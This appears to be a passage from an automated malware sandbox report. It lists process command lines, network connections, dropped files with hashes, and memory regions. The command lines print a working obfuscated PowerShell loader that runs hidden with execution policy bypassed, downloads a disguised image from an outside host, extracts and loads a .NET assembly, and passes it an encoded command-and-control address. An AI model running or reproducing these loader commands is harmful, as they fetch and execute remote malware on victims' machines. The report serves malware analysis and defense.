♚Hg♛♚I♛♚♛♚t♛♚C♛♚♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚Ds♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚C♛♚♛♚PQ♛♚g
♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBT♛♚HU♛♚YgBz♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚s♛♚C♛♚♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚p♛♚Ds♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚QwBv♛♚G4♛♚dgBl♛♚HI♛♚d♛♚Bd♛♚Do♛♚OgBG♛♚HI♛♚bwBt♛♚EI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚Ck♛♚Ow♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚UgBl♛♚GY♛♚b♛♚Bl♛♚GM♛♚d♛♚Bp♛♚G8♛♚bg♛♚u♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQBd♛♚Do♛♚OgBM♛♚G8♛♚YQBk♛♚Cg♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚p♛♚Ds♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚b♛♚Bv♛♚GE♛♚Z♛♚Bl♛♚GQ♛♚QQBz♛♚HM♛♚ZQBt♛♚GI♛♚b♛♚B5♛♚C4♛♚RwBl♛♚HQ♛♚V♛♚B5♛♚H♛♚♛♚ZQ♛♚o♛♚Cc♛♚QwBs♛♚GE♛♚cwBz♛♚Ew♛♚aQBi♛♚HI♛♚YQBy♛♚Hk♛♚Mw♛♚u♛♚EM♛♚b♛♚Bh♛♚HM♛♚cw♛♚x♛♚Cc♛♚KQ♛♚7♛♚CQ♛♚bQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C4♛♚RwBl♛♚HQ♛♚TQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚K♛♚♛♚n♛♚FI♛♚dQBu♛♚Cc♛♚KQ♛♚u♛♚Ek♛♚bgB2♛♚G8♛♚awBl♛♚Cg♛♚J♛♚Bu♛♚HU♛♚b♛♚Bs♛♚Cw♛♚I♛♚Bb♛♚G8♛♚YgBq♛♚GU♛♚YwB0♛♚Fs♛♚XQBd♛♚C♛♚♛♚K♛♚♛♚n♛♚GQ♛♚S♛♚Bo♛♚D♛♚♛♚T♛♚Br♛♚E4♛♚TgBV♛♚Gk♛♚OQBu♛♚GM♛♚bgBj♛♚HY♛♚TwBD♛♚DQ♛♚egBO♛♚EM♛♚N♛♚♛♚0♛♚E0♛♚agBJ♛♚HU♛♚TgBq♛♚Fk♛♚dgBM♛♚Ho♛♚c♛♚B3♛♚GQ♛♚S♛♚BS♛♚G8♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZgBk♛♚GY♛♚Z♛♚♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bh♛♚GQ♛♚cwBh♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GU♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GM♛♚dQ♛♚n♛♚Ck♛♚KQ♛♚=';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/683/196/original/dll_js.jpg?1701821835';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('ClassLibrary3.Class1');$method = $type.GetMethod('Run').Invoke($null, [object[]] ('dHh0LkNNUi9ncncvOC4zNC44MjIuNjYvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 188.114.96.0:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | uploaddeimagens.com.br | udp |
| US | 188.114.96.0:443 | uploaddeimagens.com.br | tcp |
| US | 8.8.8.8:53 | 198.5.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 66.228.43.8:80 | 66.228.43.8 | tcp |
| US | 8.8.8.8:53 | 8.43.228.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 107.172.31.178:1070 | N/A | tcp |
| US | 8.8.8.8:53 | 178.31.172.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.5.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.78.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.173.189.20.in-addr.arpa | udp |
Files
memory/3240-0-0x000002937C560000-0x000002937C582000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ka45prqq.unx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3240-10-0x00007FFC66A90000-0x00007FFC67551000-memory.dmp
memory/3240-12-0x000002937A300000-0x000002937A310000-memory.dmp
memory/3240-11-0x000002937A300000-0x000002937A310000-memory.dmp
memory/4576-13-0x00007FFC66A90000-0x00007FFC67551000-memory.dmp
memory/4576-23-0x0000015A438B0000-0x0000015A438C0000-memory.dmp
memory/4576-24-0x0000015A2B6C0000-0x0000015A2B6CA000-memory.dmp
memory/4576-25-0x0000015A2B6D0000-0x0000015A2B6D8000-memory.dmp
memory/744-26-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4576-29-0x00007FFC66A90000-0x00007FFC67551000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5caad758326454b5788ec35315c4c304 |
| SHA1 | 3aef8dba8042662a7fcf97e51047dc636b4d4724 |
| SHA256 | 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391 |
| SHA512 | 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f41839a3fe2888c8b3050197bc9a0a05 |
| SHA1 | 0798941aaf7a53a11ea9ed589752890aee069729 |
| SHA256 | 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a |
| SHA512 | 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699 |
memory/3240-34-0x00007FFC66A90000-0x00007FFC67551000-memory.dmp
memory/744-33-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-35-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-37-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-38-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-39-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-40-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-41-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-42-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-44-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-45-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-46-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-47-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-48-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-49-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-50-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-51-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-52-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-53-0x0000000000400000-0x0000000000482000-memory.dmp
memory/744-54-0x0000000000400000-0x0000000000482000-memory.dmp